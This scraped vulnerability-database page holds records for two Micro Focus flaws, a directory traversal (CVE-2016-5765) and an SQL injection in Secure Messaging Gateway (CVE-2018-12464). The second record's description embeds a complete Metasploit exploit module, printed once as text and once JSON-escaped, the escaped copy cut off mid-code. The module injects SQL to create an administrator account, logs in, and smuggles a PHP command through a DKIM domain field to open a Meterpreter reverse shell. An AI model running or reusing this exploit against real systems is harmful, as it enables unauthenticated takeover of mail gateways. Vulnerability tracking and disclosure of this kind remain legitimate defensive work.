                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-5765",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-5765",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "ZDI",
                "id": "CVE-2016-5765",
                "trust": 0.7,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201611-648",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-94584",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-16-618"
          },
          {
            "db": "VULHUB",
            "id": "VHN-94584"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-5765"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Administrative Server in Micro Focus Host Access Management and Security Server (MSS) and Reflection for the Web (RWeb) and Reflection Security Gateway (RSG) and Reflection ZFE (ZFE) allows remote unauthenticated attackers to read arbitrary files via a specially crafted URL that allows limited directory traversal. Applies to MSS 12.3 before 12.3.326 and MSS 12.2 before 12.2.342 and RSG 12.1 before 12.1.362 and RWeb 12.3 before 12.3.312 and RWeb 12.2 before 12.2.342 and RWeb 12.1 before 12.1.362 and ZFE 2.0.1 before 2.0.1.18 and ZFE 2.0.0 before 2.0.0.52 and ZFE 1.4.0 before 1.4.0.14. Authentication is not required to exploit this vulnerability.The specific flaw exists within the PassThru resource. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of the current process. Multiple Micro Focus Products are prone to an directory-traversal vulnerability. \nRemote attackers can use specially crafted requests with  directory-traversal sequences (\u0027../\u0027) to read arbitrary  files in the context of the application. This may aid in further  attacks. The following versions are affected: 12.3 prior to MSS 12.3.326, 12.2 prior to MSS 12.2.342; 12.1 prior to RSG 12.1.362; 12.3 prior to RWeb 12.3.312, 12.2 prior to RWeb 12.2.342, RWeb 12.1 before 12.1.362; ZFE 2.0.1.18 before 2.0.1, Reflection ZFE (ZFE) 2.0.0 before ZFE 2.0.0.52, ZFE 1.4.0 before 1.4.0.14",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-5765"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          },
          {
            "db": "ZDI",
            "id": "ZDI-16-618"
          },
          {
            "db": "BID",
            "id": "94579"
          },
          {
            "db": "VULHUB",
            "id": "VHN-94584"
          }
        ],
        "trust": 2.61
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-5765",
            "trust": 3.5
          },
          {
            "db": "ZDI",
            "id": "ZDI-16-618",
            "trust": 1.8
          },
          {
            "db": "BID",
            "id": "94579",
            "trust": 1.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-4022",
            "trust": 0.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-94584",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-16-618"
          },
          {
            "db": "VULHUB",
            "id": "VHN-94584"
          },
          {
            "db": "BID",
            "id": "94579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-5765"
          }
        ]
      },
      "id": "VAR-201611-0266",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-94584"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T23:33:56.016000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Technical Note 1704",
            "trust": 1.5,
            "url": "http://support.attachmate.com/techdocs/1704.html"
          },
          {
            "title": "Multiple Micro Focus Product information disclosure vulnerability repair measures",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=65920"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-16-618"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-200",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-22",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-94584"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-5765"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.7,
            "url": "http://support.attachmate.com/techdocs/1704.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/bid/94579"
          },
          {
            "trust": 1.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-16-618"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5765"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5765"
          },
          {
            "trust": 0.3,
            "url": "http://www.merant.com/products/microfocus/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-16-618"
          },
          {
            "db": "VULHUB",
            "id": "VHN-94584"
          },
          {
            "db": "BID",
            "id": "94579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-5765"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-16-618",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-94584",
            "ident": null
          },
          {
            "db": "BID",
            "id": "94579",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2016-5765",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2016-12-13T00:00:00",
            "db": "ZDI",
            "id": "ZDI-16-618",
            "ident": null
          },
          {
            "date": "2016-11-29T00:00:00",
            "db": "VULHUB",
            "id": "VHN-94584",
            "ident": null
          },
          {
            "date": "2016-11-29T00:00:00",
            "db": "BID",
            "id": "94579",
            "ident": null
          },
          {
            "date": "2016-12-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2016-006045",
            "ident": null
          },
          {
            "date": "2016-11-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201611-648",
            "ident": null
          },
          {
            "date": "2016-11-29T11:59:00.177000",
            "db": "NVD",
            "id": "CVE-2016-5765",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2016-12-13T00:00:00",
            "db": "ZDI",
            "id": "ZDI-16-618",
            "ident": null
          },
          {
            "date": "2016-12-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-94584",
            "ident": null
          },
          {
            "date": "2016-12-20T00:04:00",
            "db": "BID",
            "id": "94579",
            "ident": null
          },
          {
            "date": "2016-12-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2016-006045",
            "ident": null
          },
          {
            "date": "2016-11-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201611-648",
            "ident": null
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2016-5765",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "plural  Micro Focus Vulnerability to read arbitrary files in the product management server",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201806-1215

    Vulnerability from variot - Updated: 2024-11-23 22:34

    A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. An unauthenticated user can execute a terminal command under the context of the web user.

        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. 
        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
        to access this endpoint without having a valid session.
    
        Combining these vulnerabilities gives the opportunity execute operation system commands under the context
        of the web user. 
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
          ['CVE', '2018-12464'],
          ['CVE', '2018-12465'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
        ],
      'DefaultOptions'  =>
        {
          'Payload' => 'php/meterpreter/reverse_tcp',
          'Encoder' => 'php/base64'
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 19 2018",
      'DefaultTarget'  => 0
    ))
    
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
    

    end

    def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3))

    send_request_cgi(
      'method'  => 'POST',
      'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
      'vars_post' => {
        'appkey' => sql
      }
    )
    

    end

    def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end

    def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end

    def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } })

    if res && res.code == 200 && res.body.include?('DbNodeId')
      # Defining as global variable since we need to access them later within clean up function. 
      begin
        @domainid  = res.get_json_document['Nodes'][0]['DbNodeId']
        @dkimid  = res.get_json_document['Nodes'][1]['DbNodeId']
      rescue => e
        fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
      end
      print_good('Payload is successfully implanted')
    else
      something_went_wrong
    end
    

    end

    def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges')

    # Defining as global variable since we need to access them later within clean up function. 
    @username = rand_text_alpha_lower(5..25)
    @userid = rand_text_numeric(6..8)
    query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
    
    execute_query(query)
    res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")
    
    if res && res.code == 200 && res.body.include?(@username)
      print_good("User successfully created. Username : #{@username}")
    else
      something_went_wrong
    end
    

    end

    def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end

    def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end

    create_user
    cookie = login
    implant_payload(cookie)
    
    print_status('Triggering an implanted payload')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
      'cookie' => cookie,
      'vars_get' => {
        'cache' => 0,
      },
      'vars_post' => {
        'DkimRecordId' => @dkimid
      }
    })
    

    end

    def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end

    end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1215",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "secure messaging gateway",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "microfocus",
            "version": "471"
          },
          {
            "model": "micro focus secure messaging gateway",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "471"
          },
          {
            "model": "focus secure messaging gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "471"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "106343"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:microfocus:secure_messaging_gateway",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "MEHMET INCE",
        "sources": [
          {
            "db": "BID",
            "id": "106343"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2018-12464",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-12464",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-122426",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-12464",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security@opentext.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-12464",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-12464",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "security@opentext.com",
                "id": "CVE-2018-12464",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-12464",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201807-018",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-122426",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). \nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. \n        An unauthenticated user can execute a terminal command under the context of the web user. \n\n        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. \n        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It\u0027s not possible\n        to access this endpoint without having a valid session. \n\n        Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n        of the web user. \n      },\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Mehmet Ince \u003cmehmet@mehmetince.net\u003e\u0027 # author \u0026 msf module\n        ],\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027URL\u0027, \u0027https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],\n          [\u0027CVE\u0027, \u00272018-12464\u0027],\n          [\u0027CVE\u0027, \u00272018-12465\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023132\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023133\u0027]\n        ],\n      \u0027DefaultOptions\u0027  =\u003e\n        {\n          \u0027Payload\u0027 =\u003e \u0027php/meterpreter/reverse_tcp\u0027,\n          \u0027Encoder\u0027 =\u003e \u0027php/base64\u0027\n        },\n      \u0027Platform\u0027       =\u003e [\u0027php\u0027],\n      \u0027Arch\u0027           =\u003e ARCH_PHP,\n      \u0027Targets\u0027        =\u003e [[ \u0027Automatic\u0027, { }]],\n      \u0027Privileged\u0027     =\u003e false,\n      \u0027DisclosureDate\u0027 =\u003e \"Jun 19 2018\",\n      \u0027DefaultTarget\u0027  =\u003e 0\n    ))\n\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The URI of the vulnerable instance\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  def execute_query(query)\n    #\n    # We have a very rare SQLi case in here. Normally, it\u0027s would be very easy to exploit it by using time-based techniques\n    # but since we are able to use stacked-query approach, following form of payload is required in order to be able\n    # get back the output of query !\n    #\n    sql = rand_text_alphanumeric(3 + rand(3))\n    sql \u003c\u003c \"\u0027) LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; \"\n    sql \u003c\u003c query\n    sql \u003c\u003c \"; -- \"\n    sql \u003c\u003c rand_text_alphanumeric(3 + rand(3))\n\n    send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027api\u0027, \u00271\u0027, \u0027enginelist.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027appkey\u0027 =\u003e sql\n      }\n    )\n\n  end\n\n  def something_went_wrong\n    fail_with Failure::Unknown, \u0027Something went wrong\u0027\n  end\n\n  def check\n    r = rand_text_numeric(15..35)\n    res = execute_query(\"SELECT #{r}\")\n    unless res\n      vprint_error \u0027Connection failed\u0027\n      return CheckCode::Unknown\n    end\n    unless res.code == 200 \u0026\u0026 res.body.include?(r)\n      return CheckCode::Safe\n    end\n    CheckCode::Vulnerable\n  end\n\n  def implant_payload(cookie)\n    print_status(\u0027Creating a domain record with a malformed DKIM data\u0027)\n    p = [\n      {\n        :id =\u003e \u0027temp_0\u0027,\n        :Description =\u003e rand_text_alpha(5),\n        :DkimList =\u003e [\n          {\n            :Domain =\u003e \"$(php -r \u0027#{payload.encoded}\u0027)\",\n            :Selector =\u003e \u0027\u0027,\n            :TempId =\u003e \u0027tempDkim_1\u0027\n          }\n        ]\n      }\n    ].to_json\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_save_data.json.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027StateData\u0027 =\u003e \u0027[{\"ouid\":1}]\u0027,\n        \u0027SaveData\u0027 =\u003e p\n      }\n    })\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027DbNodeId\u0027)\n      # Defining as global variable since we need to access them later within clean up function. \n      begin\n        @domainid  = res.get_json_document[\u0027Nodes\u0027][0][\u0027DbNodeId\u0027]\n        @dkimid  = res.get_json_document[\u0027Nodes\u0027][1][\u0027DbNodeId\u0027]\n      rescue =\u003e e\n        fail_with Failure::UnexpectedReply, \"Something went horribly wrong while implanting the payload : #{e.message}\"\n      end\n      print_good(\u0027Payload is successfully implanted\u0027)\n    else\n      something_went_wrong\n    end\n  end\n\n  def create_user\n    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection\n    # issue location where requires a valid session !\n    print_status(\u0027Creating a user with appropriate privileges\u0027)\n\n    # Defining as global variable since we need to access them later within clean up function. \n    @username = rand_text_alpha_lower(5..25)\n    @userid = rand_text_numeric(6..8)\n    query = \"INSERT INTO account VALUES (#{@userid}, 1, \u0027#{@username}\u0027, \u00270\u0027, \u0027\u0027, 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)\"\n\n    execute_query(query)\n    res = execute_query(\"SELECT * FROM account WHERE loginname = \u0027#{@username}\u0027\")\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(@username)\n      print_good(\"User successfully created. Username : #{@username}\")\n    else\n      something_went_wrong\n    end\n  end\n\n  def login\n    print_status(\"Authenticating with created user\")\n    res = send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027security\u0027, 